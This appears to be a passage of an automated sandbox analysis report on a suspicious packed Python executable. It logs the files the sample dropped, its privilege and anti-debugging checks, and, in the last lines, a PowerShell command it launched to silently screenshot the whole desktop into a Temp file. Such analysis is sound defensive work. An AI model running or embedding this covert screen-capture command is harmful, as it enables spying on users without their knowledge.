      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4447Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2537Jump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\_wmi.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_Salsa20.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_SHA512.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\win32\win32api.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Protocol\_scrypt.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_MD5.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_MD4.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\_sqlite3.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_chacha20.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_ghash_clmul.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_cbc.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_keccak.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_ghash_portable.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\pyexpat.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_cast.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_SHA256.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_ctr.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\_multiprocessing.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_des3.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_SHA384.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\_hashlib.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_poly1305.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\select.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_MD2.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\_cffi_backend.cp312-win_amd64.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\_decimal.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\_ssl.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_arc2.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\PublicKey\_ec_ws.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Util\_strxor.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\_bz2.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\python312.dllJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\PublicKey\_x25519.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_des.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_SHA224.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\cryptography\hazmat\bindings\_rust.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\win32\win32crypt.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_cfb.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Util\_cpuid_c.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_aesni.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\_socket.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\PublicKey\_ed448.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\_ctypes.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_ecb.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_RIPEMD160.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\_queue.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\python3.dllJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\_overlapped.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\PublicKey\_ed25519.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_ARC4.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_BLAKE2b.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_ofb.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_BLAKE2s.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\_lzma.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Math\_modexp.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_SHA1.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\_asyncio.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\unicodedata.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_aes.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_ocb.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-16384
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeAPI coverage: 1.1 %
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860Thread sleep time: -4611686018427385s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836Thread sleep time: -1844674407370954s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDC88D0 FindFirstFileExW,FindClose,0_2_00007FF7FBDC88D0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDD7E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF7FBDD7E4C
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDE1EE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7FBDE1EE4
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDD7E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF7FBDD7E4C
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCBB1490 GetSystemInfo,2_2_00007FFEDCBB1490
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: cacert.pem.0.drBinary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
      Source: MkWMm5piE5.exe, 00000002.00000002.2591216215.000001E4C87BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: cacert.pem.0.drBinary or memory string: zJVSk/BwJVmcIGfE7vmLV2H0knZ9P4SNVbfo5azV8fUZVqZa+5Acr5Pr5RzUZ5dd
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDDABD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7FBDDABD8
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDE3AF0 GetProcessHeap,0_2_00007FF7FBDE3AF0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDCBCE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7FBDCBCE0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDDABD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7FBDDABD8
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDCC760 SetUnhandledExceptionFilter,0_2_00007FF7FBDCC760
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDCC57C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7FBDCC57C
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC461390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFEDC461390
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC461960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFEDC461960
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC471390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFEDC471390
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC471960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFEDC471960
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC481390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFEDC481390
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC481960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFEDC481960
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC491390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFEDC491390
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC491960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFEDC491960
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC4A1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFEDC4A1390
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC4A1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFEDC4A1960
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC4B1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFEDC4B1390
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC4B1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFEDC4B1960
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC4C1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFEDC4C1390
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC4C1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFEDC4C1960
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC4D1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFEDC4D1390
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC4D1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFEDC4D1960
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC4E1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFEDC4E1390
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC4E1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFEDC4E1960
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC4F1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFEDC4F1390
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC4F1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFEDC4F1960
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC501390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFEDC501390
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC501960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFEDC501960
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC511390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFEDC511390
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC511960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFEDC511960
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC521390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFEDC521390
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDC521960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFEDC521960
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCD12AA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFEDCD12AA0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCD13068 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFEDCD13068
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDD931960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFEDD931960
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDD931390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFEDD931390
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDD941960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFEDD941960
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDD941390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFEDD941390
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDD9642E8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFEDD9642E8
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDD963D20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFEDD963D20
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeProcess created: C:\Users\user\Desktop\MkWMm5piE5.exe "C:\Users\user\Desktop\MkWMm5piE5.exe"Jump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " add-type -assemblyname system.windows.forms add-type -assemblyname system.drawing $screen = [system.windows.forms.systeminformation]::virtualscreen $bitmap = new-object system.drawing.bitmap $screen.width, $screen.height $graphics = [system.drawing.graphics]::fromimage($bitmap) $graphics.copyfromscreen($screen.location, [system.drawing.point]::empty, $screen.size) $bitmap.save(\"c:\users\user\appdata\local\temp\desktop_screenshot.png\") "
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " add-type -assemblyname system.windows.forms add-type -assemblyname system.drawing $screen = [system.windows.forms.systeminformation]::virtualscreen $bitmap = new-object system.drawing.bitmap $screen.width, $screen.height $graphics = [system.drawing.graphics]::fromimage($bitmap) $graphics.copyfromscreen($screen.location, [system.drawing.point]::empty, $screen.size) $bitmap.save(\"c:\users\user\appdata\local\temp\desktop_screenshot.png\") "Jump to behavior
